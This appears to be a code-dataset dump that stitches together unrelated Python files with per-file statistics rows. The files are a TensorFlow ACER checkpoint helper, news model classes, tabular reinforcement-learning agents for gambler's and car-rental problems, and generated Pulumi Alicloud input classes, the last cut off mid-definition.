        trpo_scale, klprod, kl, diff, entropy, loss, optimize = self.sess.run([self.trpo_scale, self.klprod, self.kl, self.advantage_qret_diff, self.entropy, self.loss, self.optimize], feed_dict=feed_dict)
        update_avg_theta = self.sess.run([self.update_avg_theta], feed_dict=feed_dict)
        return loss, entropy, optimize

    def predict_policy(self, inputs, execMask):
        """Return action probabilities for a batch of states."""
        return self.sess.run(self.policy, feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def predict_value(self, inputs, execMask):
        """Return state values V(s) = sum_a pi(a|s) * Q(s, a)."""
        return self.sess.run(self.value, feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def predict_action_value(self, inputs, execMask):
        """Return (policy, value) for a batch of states in a single session run."""
        return self.sess.run([self.policy, self.value], feed_dict={
            self.inputs: inputs,
            self.execMask: execMask,
        })

    def load_network(self, load_filename):
        """Restore weights from a checkpoint, skipping the first iteration.

        NOTE(review): the filename's third-from-last dot-separated field is
        used as the iteration number, and the bare except silently swallows
        every restore failure.
        """
        self.saver = tf.train.Saver()
        if load_filename.split('.')[-3] != '0':
            try:
                self.saver.restore(self.sess, load_filename)
                print "Successfully loaded:", load_filename
            except:
                print "Could not find old network weights"
        else:
            print 'nothing loaded in first iteration'

    def save_network(self, save_filename):
        """Save weights to a checkpoint.

        NOTE(review): relies on load_network() having been called first to
        create self.saver (the local Saver construction is commented out) —
        confirm the caller guarantees that ordering.
        """
        print 'Saving acer-network...'
        #self.saver = tf.train.Saver()
        self.saver.save(self.sess, save_filename)
| 46.74856
| 205
| 0.603794
| 3,438
| 24,356
| 4.078243
| 0.093368
| 0.025676
| 0.026674
| 0.018544
| 0.904001
| 0.890236
| 0.88075
| 0.876685
| 0.876685
| 0.876685
| 0
| 0.020805
| 0.265889
| 24,356
| 520
| 206
| 46.838462
| 0.763367
| 0.110117
| 0
| 0.916898
| 0
| 0
| 0.011071
| 0
| 0
| 0
| 0
| 0.003846
| 0.00554
| 0
| null | null | 0
| 0.022161
| null | null | 0.022161
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96aad596783af257f22c3dd4f27142ee5c482efd
| 170
|
py
|
Python
|
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | 2
|
2021-06-25T08:42:36.000Z
|
2021-06-25T08:49:29.000Z
|
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/__init__.py
|
alvin-chang/lightning-flash
|
481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5
|
[
"Apache-2.0"
] | null | null | null |
from flash.core.data.datamodule import DataModule, TaskDataPipeline
from flash.core.data.datapipeline import DataPipeline
from flash.core.data.utils import download_data
| 42.5
| 67
| 0.864706
| 23
| 170
| 6.347826
| 0.434783
| 0.184932
| 0.267123
| 0.349315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076471
| 170
| 3
| 68
| 56.666667
| 0.929936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96bdc97dfaa2e32bf6e50c9a66aee7b20e94bf0f
| 830
|
py
|
Python
|
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
class News_source:
    """A news source record: one entry returned by the news API."""

    def __init__(self, id, name, title, description, url, urlToImage,
                 publishedAt, content):
        # Bind each constructor argument to an attribute of the same name.
        for field, value in (('id', id), ('name', name), ('title', title),
                             ('description', description), ('url', url),
                             ('urlToImage', urlToImage),
                             ('publishedAt', publishedAt),
                             ('content', content)):
            setattr(self, field, value)
class Articles:
    """An article record: one news article returned by the news API."""

    def __init__(self, id, name, title, description, url, urlToImage,
                 publishedAt, content):
        # Bind each constructor argument to an attribute of the same name.
        for field, value in (('id', id), ('name', name), ('title', title),
                             ('description', description), ('url', url),
                             ('urlToImage', urlToImage),
                             ('publishedAt', publishedAt),
                             ('content', content)):
            setattr(self, field, value)
| 27.666667
| 84
| 0.625301
| 89
| 830
| 5.707865
| 0.202247
| 0.047244
| 0.051181
| 0.070866
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0
| 0
| 0.292771
| 830
| 30
| 85
| 27.666667
| 0.865417
| 0.107229
| 0
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7373061ad55c7e34dbdf029e1672f2791aab7883
| 10,183
|
py
|
Python
|
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | null | null | null |
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | null | null | null |
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | 1
|
2022-03-14T16:08:33.000Z
|
2022-03-14T16:08:33.000Z
|
from abc import ABC, abstractmethod
import numpy as np
class DiscreteAgent(ABC):
    """Abstract base for tabular agents on a discrete MDP.

    Holds two value tables (V and a scratch copy V2), a tabular policy,
    the transition model P taken from the environment, and the usual
    discount/convergence hyper-parameters.
    """

    def __init__(self, env):
        self.nstates = env.nstates
        self.nactions = env.nactions
        self.V = np.zeros(env.nstates)
        self.V2 = np.zeros(env.nstates)
        self.policy = np.zeros([env.nstates, env.nactions])
        self.delta = 0
        self.gamma = 1
        self.P = env.P
        self.threshold = 0.00001

    @abstractmethod
    def update(self):
        pass

    def get_action(self, state):
        """One-step lookahead: expected return of each action from *state*."""
        lookahead = np.zeros(self.nactions)
        for action in range(self.nactions):
            lookahead[action] = sum(
                prob * (reward + self.gamma * self.V[nxt])
                for prob, nxt, reward, terminate in self.P[state][action]
            )
        return lookahead

    @abstractmethod
    def reset(self):
        pass

    @abstractmethod
    def get_policy(self):
        pass

    def set_gamma(self, gamma):
        self.gamma = gamma

    def set_threshold(self, threshold):
        self.threshold = threshold

    def get_threshold(self):
        return self.threshold

    def get_delta(self):
        return self.delta

    def clear(self):
        """Reset both value tables and the policy to all zeros."""
        self.V = np.zeros(self.nstates)
        self.V2 = np.zeros(self.nstates)
        self.policy = np.zeros([self.nstates, self.nactions])
class PolicyIteration(DiscreteAgent):
    """Classic policy iteration: alternate evaluation and greedy improvement."""

    def __init__(self, env):
        super().__init__(env)
        # Start from the uniform random policy.
        self.policy = np.ones([self.nstates, self.nactions]) / self.nactions

    def evaluate_policy(self):
        """Iterative policy evaluation; returns a copy of the converged V."""
        self.V2 = np.zeros(self.nstates)
        self.V = np.zeros(self.nstates)
        while True:
            self.delta = 0
            self.V = np.copy(self.V2)
            for s in range(self.nstates):
                backup = 0
                for a, pi_sa in enumerate(self.policy[s]):
                    for prob, nxt, reward, done in self.P[s][a]:
                        backup += pi_sa * prob * (reward + self.gamma * self.V[nxt])
                self.delta = max(self.delta, np.abs(backup - self.V[s]))
                self.V2[s] = backup
            if self.delta < self.threshold:
                break
        return np.array(self.V)

    def update(self):
        """One greedy-improvement sweep; True when the policy did not change."""
        stable = True
        for s in range(self.nstates):
            previous = np.argmax(self.policy[s])
            greedy = np.argmax(self.get_action(s))
            if previous != greedy:
                stable = False
            # One-hot policy on the greedy action.
            self.policy[s] = np.eye(self.nactions)[greedy]
        return stable

    def get_policy(self):
        return self.policy

    def reset(self):
        pass

    def clear(self):
        super().clear()
        self.policy = np.ones([self.nstates, self.nactions]) / self.nactions
class ValueIteration(DiscreteAgent):
    """Value iteration: synchronous Bellman-optimality backups over states."""

    def update(self):
        """One sweep: V2[s] <- max_a Q(s, a), tracking the largest change."""
        self.V = np.copy(self.V2)
        for s in range(self.nstates):
            best = np.max(self.get_action(s))
            self.delta = max(self.delta, np.abs(best - self.V[s]))
            self.V2[s] = best

    def reset(self):
        self.delta = 0

    def get_policy(self):
        """Extract the greedy deterministic policy from the current V."""
        self.policy = np.zeros([self.nstates, self.nactions])
        for s in range(self.nstates):
            self.policy[s, np.argmax(self.get_action(s))] = 1.0
        return self.policy
class ConfusedAgent(DiscreteAgent):
    """Baseline agent that commits to a uniformly random action per state."""

    def get_policy(self):
        self.policy = np.zeros([self.nstates, self.nactions])
        for s in range(self.nstates):
            lookahead = self.get_action(s)
            # NOTE(review): high=4 hard-codes four actions — presumably
            # nactions == 4 in this environment; confirm against callers.
            choice = np.random.randint(low=0, high=4)
            self.policy[s, choice] = 1.0
            self.V[s] = lookahead[choice]
        return self.policy

    def reset(self):
        pass

    def update(self):
        pass
class Gambler_ValueIteration(DiscreteAgent):
    """Value iteration for the gambler's problem.

    States are the gambler's capital 0..goal. The goal capital was
    previously hard-coded to 100; it is now derived from the environment
    size (goal == nstates - 1), which is backward compatible with the
    standard 101-state setup and makes other board sizes work too.
    """

    def __init__(self, env):
        super().__init__(env)
        self.p_h = env.p_h          # probability the coin comes up heads
        self.rewards = env.rewards  # per-state reward table

    def get_action(self, state):
        """Expected value of every legal bet (stake) from *state*."""
        goal = self.nstates - 1  # was the hard-coded constant 100
        A = np.zeros(self.nstates)
        possible_bet = range(1, min(state, goal - state) + 1)
        for a in possible_bet:
            win = self.rewards[state + a] + self.V[state + a] * self.gamma
            lose = self.rewards[state - a] + self.V[state - a] * self.gamma
            A[a] = self.p_h * win + (1 - self.p_h) * lose
        return A

    def update(self):
        """One sweep over the non-terminal states; returns the V snapshots.

        NOTE(review): every element of the returned list aliases the same
        self.V array (appended once per state) — confirm callers only use
        it for plotting the final values.
        """
        y = []
        self.V = np.copy(self.V2)
        for s in range(1, self.nstates - 1):
            A = self.get_action(s)
            best_action_value = np.max(A)
            self.delta = max(self.delta, np.abs(best_action_value - self.V[s]))
            self.V2[s] = best_action_value
            y.append(self.V)
        return y

    def reset(self):
        self.delta = 0

    def get_policy(self):
        """Greedy stake for each state under the current value estimates."""
        self.policy = np.zeros(self.nstates - 1)
        for s in range(self.nstates - 1):
            A = self.get_action(s)
            self.policy[s] = np.argmax(A)
        return self.policy

    def clear(self):
        super().clear()
        self.policy = np.zeros(self.nstates - 1)
class Jack_PolicyIteration():
    """Policy iteration for Jack's car-rental problem (two locations).

    The environment supplies pre-computed rental/return probability tables
    (store_rent_*/store_return_*); `limit` truncates those distributions.
    An action is the (signed) number of cars moved from lot 1 to lot 2
    overnight, at `loss` cost per car; each satisfied rental earns `profit`.
    """

    def __init__(self, env):
        self.limit = 8  # truncation point for the rent/return sums
        self.max_cars = env.max_cars
        self.V = np.zeros((self.max_cars + 1, self.max_cars + 1))
        self.V_2 = np.zeros((self.max_cars + 1, self.max_cars + 1))
        # dtype was np.int, an alias removed in NumPy >= 1.24; plain int
        # is the documented equivalent and yields the same array dtype.
        self.policy = np.zeros(self.V.shape, dtype=int)
        self.delta = 0
        self.profit = env.profit
        self.loss = env.loss
        self.gamma = 0.9
        self.store_return_1 = env.store_return_1
        self.store_return_2 = env.store_return_2
        self.store_rent_1 = env.store_rent_1
        self.store_rent_2 = env.store_rent_2
        self.threshold = 0.001
        self.actions = env.actions

    def get_next_value(self, state, action):
        """Expected return of taking *action* in *state* under current V."""
        value = 0.0
        value -= self.loss * abs(action)  # cost of moving cars overnight
        cars_at_1 = min(state[0] - action, self.max_cars)
        cars_at_2 = min(state[1] + action, self.max_cars)
        for rent_1 in range(self.limit):
            for rent_2 in range(self.limit):
                prob_rent = self.store_rent_1[rent_1] * self.store_rent_2[rent_2]
                present_number_at_1 = cars_at_1
                present_number_at_2 = cars_at_2
                # Only as many rentals as there are cars can be satisfied.
                request_at_1 = min(present_number_at_1, rent_1)
                request_at_2 = min(present_number_at_2, rent_2)
                reward = (request_at_1 + request_at_2) * (self.profit)
                present_number_at_1 -= request_at_1
                present_number_at_2 -= request_at_2
                for return_1 in range(self.limit):
                    for return_2 in range(self.limit):
                        prob_return = self.store_return_1[return_1] * self.store_return_2[return_2]
                        # Returned cars are capped by the lot capacity.
                        present_number_at_1_1 = min(present_number_at_1 + return_1, self.max_cars)
                        present_number_at_2_1 = min(present_number_at_2 + return_2, self.max_cars)
                        value += (prob_return * prob_rent) * (
                            reward + (self.gamma) * self.V[present_number_at_1_1][present_number_at_2_1])
        return value

    def evaluate_policy(self):
        """Iterative policy evaluation until the max change drops below threshold."""
        while True:
            self.delta = 0
            self.V_2 = self.V.copy()
            for i in range(self.max_cars + 1):
                for j in range(self.max_cars + 1):
                    next_state_value = self.get_next_value([i, j], self.policy[i][j])
                    self.V[i][j] = next_state_value
            self.delta = abs(self.V_2 - self.V).max()
            if self.delta < self.threshold:
                break

    def update(self):
        """One greedy-improvement sweep; True when no state's action changed."""
        policy_stable = True
        for i in range(self.max_cars + 1):
            for j in range(self.max_cars + 1):
                chosen_a = self.policy[i][j]
                candidates = []
                for action in self.actions:
                    # An action may not move more cars than its source lot holds.
                    if (0 <= action <= i) or (-j <= action <= 0):
                        candidates.append(self.get_next_value([i, j], action))
                    else:
                        candidates.append(-np.inf)
                new_action = self.actions[np.argmax(candidates)]
                self.policy[i][j] = new_action
                if policy_stable and chosen_a != new_action:
                    policy_stable = False
        return policy_stable
class Jack_PolicyIteration_2():
    """Jack's car-rental with the exercise-4.7 modifications.

    Differences from Jack_PolicyIteration: one car can be shuttled to
    lot 2 for free (the first moved car costs nothing when action > 0),
    and a fixed `cost` surcharge applies per lot holding more than 10
    cars overnight.
    """

    def __init__(self, env):
        self.limit = 8  # truncation point for the rent/return sums
        self.max_cars = env.max_cars
        self.V = np.zeros((self.max_cars + 1, self.max_cars + 1))
        self.V_2 = np.zeros((self.max_cars + 1, self.max_cars + 1))
        # dtype was np.int, an alias removed in NumPy >= 1.24; plain int
        # is the documented equivalent and yields the same array dtype.
        self.policy = np.zeros(self.V.shape, dtype=int)
        self.delta = 0
        self.profit = env.profit
        self.loss = env.loss
        self.gamma = 0.9
        self.store_return_1 = env.store_return_1
        self.store_return_2 = env.store_return_2
        self.store_rent_1 = env.store_rent_1
        self.store_rent_2 = env.store_rent_2
        self.threshold = 0.001
        self.actions = env.actions
        self.cost = 4  # overnight parking surcharge per overfull lot

    def get_next_value(self, state, action):
        """Expected return of taking *action* in *state* under current V."""
        value = 0.0
        # One car is moved for free in the 1 -> 2 direction.
        if action > 0:
            temp = action - 1
        else:
            temp = action
        value -= self.loss * abs(temp)
        cars_at_1 = min(state[0] - action, self.max_cars)
        cars_at_2 = min(state[1] + action, self.max_cars)
        for rent_1 in range(self.limit):
            for rent_2 in range(self.limit):
                prob_rent = self.store_rent_1[rent_1] * self.store_rent_2[rent_2]
                present_number_at_1 = cars_at_1
                present_number_at_2 = cars_at_2
                # Only as many rentals as there are cars can be satisfied.
                request_at_1 = min(present_number_at_1, rent_1)
                request_at_2 = min(present_number_at_2, rent_2)
                reward = (request_at_1 + request_at_2) * (self.profit)
                present_number_at_1 -= request_at_1
                present_number_at_2 -= request_at_2
                for return_1 in range(self.limit):
                    for return_2 in range(self.limit):
                        prob_return = self.store_return_1[return_1] * self.store_return_2[return_2]
                        present_number_at_1_1 = min(present_number_at_1 + return_1, self.max_cars)
                        present_number_at_2_1 = min(present_number_at_2 + return_2, self.max_cars)
                        # Surcharge for each lot left with more than 10 cars.
                        if present_number_at_1_1 > 10:
                            reward -= self.cost
                        if present_number_at_2_1 > 10:
                            reward -= self.cost
                        value += (prob_return * prob_rent) * (
                            reward + (self.gamma) * self.V[present_number_at_1_1][present_number_at_2_1])
        return value

    def evaluate_policy(self):
        """Iterative policy evaluation until the max change drops below threshold."""
        while True:
            self.delta = 0
            self.V_2 = self.V.copy()
            for i in range(self.max_cars + 1):
                for j in range(self.max_cars + 1):
                    next_state_value = self.get_next_value([i, j], self.policy[i][j])
                    self.V[i][j] = next_state_value
            self.delta = abs(self.V_2 - self.V).max()
            if self.delta < self.threshold:
                break

    def update(self):
        """One greedy-improvement sweep; True when no state's action changed."""
        policy_stable = True
        for i in range(self.max_cars + 1):
            for j in range(self.max_cars + 1):
                chosen_a = self.policy[i][j]
                candidates = []
                for action in self.actions:
                    # An action may not move more cars than its source lot holds.
                    if (0 <= action <= i) or (-j <= action <= 0):
                        candidates.append(self.get_next_value([i, j], action))
                    else:
                        candidates.append(-np.inf)
                new_action = self.actions[np.argmax(candidates)]
                self.policy[i][j] = new_action
                if policy_stable and chosen_a != new_action:
                    policy_stable = False
        return policy_stable
| 23.463134
| 137
| 0.677993
| 1,716
| 10,183
| 3.798368
| 0.065268
| 0.028383
| 0.06904
| 0.041731
| 0.82019
| 0.784903
| 0.767413
| 0.74977
| 0.719699
| 0.696379
| 0
| 0.024982
| 0.190219
| 10,183
| 433
| 138
| 23.517321
| 0.765462
| 0.045959
| 0
| 0.768683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128114
| false
| 0.021352
| 0.007117
| 0.010676
| 0.213523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73b0e2c8654248b765d025e21be5e1823debfc40
| 88,910
|
py
|
Python
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
# Names exported when this generated module is imported via `from ... import *`.
__all__ = [
    'ApplicationServiceArgs',
    'ClusterNodeArgs',
    'EdgeKubernetesAddonArgs',
    'EdgeKubernetesCertificateAuthorityArgs',
    'EdgeKubernetesConnectionsArgs',
    'EdgeKubernetesLogConfigArgs',
    'EdgeKubernetesWorkerDataDiskArgs',
    'EdgeKubernetesWorkerNodeArgs',
    'KubernetesAddonArgs',
    'KubernetesAutoscalerNodepoolArgs',
    'KubernetesCertificateAuthorityArgs',
    'KubernetesConnectionsArgs',
    'KubernetesMasterNodeArgs',
    'KubernetesPermissionPermissionArgs',
    'KubernetesRuntimeArgs',
    'KubernetesTaintArgs',
    'KubernetesWorkerDataDiskArgs',
    'KubernetesWorkerNodeArgs',
    'ManagedKubernetesAddonArgs',
    'ManagedKubernetesCertificateAuthorityArgs',
    'ManagedKubernetesConnectionsArgs',
    'ManagedKubernetesMaintenanceWindowArgs',
    'ManagedKubernetesRuntimeArgs',
    'ManagedKubernetesTaintArgs',
    'ManagedKubernetesWorkerDataDiskArgs',
    'ManagedKubernetesWorkerNodeArgs',
    'NodePoolDataDiskArgs',
    'NodePoolLabelArgs',
    'NodePoolManagementArgs',
    'NodePoolScalingConfigArgs',
    'NodePoolSpotPriceLimitArgs',
    'NodePoolTaintArgs',
    'ServerlessKubernetesAddonArgs',
    'SwarmNodeArgs',
    'GetKubernetesPermissionPermissionArgs',
]
@pulumi.input_type
class ApplicationServiceArgs:
    """Input properties describing one application service."""

    def __init__(__self__, *,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 version: Optional[pulumi.Input[str]] = None):
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("id", id), ("name", name),
                         ("status", status), ("version", version)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class ClusterNodeArgs:
    """Input properties describing one cluster node."""

    def __init__(__self__, *,
                 eip: Optional[pulumi.Input[str]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 private_ip: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("eip", eip), ("id", id), ("name", name),
                         ("private_ip", private_ip), ("status", status)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def eip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "eip")

    @eip.setter
    def eip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "eip", value)

    @property
    @pulumi.getter
    def id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "id")

    @id.setter
    def id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="privateIp")
    def private_ip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "private_ip")

    @private_ip.setter
    def private_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_ip", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
@pulumi.input_type
class EdgeKubernetesAddonArgs:
    def __init__(__self__, *,
                 config: Optional[pulumi.Input[str]] = None,
                 disabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("config", config), ("disabled", disabled),
                         ("name", name)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "config", value)

    @property
    @pulumi.getter
    def disabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "disabled")

    @disabled.setter
    def disabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "disabled", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The kubernetes cluster's name. It is unique in one Alicloud account.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class EdgeKubernetesCertificateAuthorityArgs:
    def __init__(__self__, *,
                 client_cert: Optional[pulumi.Input[str]] = None,
                 client_key: Optional[pulumi.Input[str]] = None,
                 cluster_cert: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
        :param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
        :param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("client_cert", client_cert),
                         ("client_key", client_key),
                         ("cluster_cert", cluster_cert)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="clientCert")
    def client_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client certificate, like `~/.kube/client-cert.pem`.
        """
        return pulumi.get(self, "client_cert")

    @client_cert.setter
    def client_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_cert", value)

    @property
    @pulumi.getter(name="clientKey")
    def client_key(self) -> Optional[pulumi.Input[str]]:
        """
        The path of client key, like `~/.kube/client-key.pem`.
        """
        return pulumi.get(self, "client_key")

    @client_key.setter
    def client_key(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_key", value)

    @property
    @pulumi.getter(name="clusterCert")
    def cluster_cert(self) -> Optional[pulumi.Input[str]]:
        """
        The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
        """
        return pulumi.get(self, "cluster_cert")

    @cluster_cert.setter
    def cluster_cert(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class EdgeKubernetesConnectionsArgs:
    """Endpoints for reaching an edge Kubernetes cluster's API server."""

    def __init__(__self__, *,
                 api_server_internet: Optional[pulumi.Input[str]] = None,
                 api_server_intranet: Optional[pulumi.Input[str]] = None,
                 master_public_ip: Optional[pulumi.Input[str]] = None,
                 service_domain: Optional[pulumi.Input[str]] = None):
        # Forward only the arguments the caller actually supplied.
        for key, arg in (("api_server_internet", api_server_internet),
                         ("api_server_intranet", api_server_intranet),
                         ("master_public_ip", master_public_ip),
                         ("service_domain", service_domain)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="apiServerInternet")
    def api_server_internet(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "api_server_internet")

    @api_server_internet.setter
    def api_server_internet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_internet", value)

    @property
    @pulumi.getter(name="apiServerIntranet")
    def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "api_server_intranet")

    @api_server_intranet.setter
    def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server_intranet", value)

    @property
    @pulumi.getter(name="masterPublicIp")
    def master_public_ip(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "master_public_ip")

    @master_public_ip.setter
    def master_public_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "master_public_ip", value)

    @property
    @pulumi.getter(name="serviceDomain")
    def service_domain(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "service_domain")

    @service_domain.setter
    def service_domain(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_domain", value)
@pulumi.input_type
class EdgeKubernetesLogConfigArgs:
    """Log-collection settings: `type` is required, `project` is optional."""

    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 project: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "type", type)
        # `project` is only forwarded when the caller supplied it.
        if project is not None:
            pulumi.set(__self__, "project", project)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)
@pulumi.input_type
class EdgeKubernetesWorkerDataDiskArgs:
    def __init__(__self__, *,
                 auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
                 category: Optional[pulumi.Input[str]] = None,
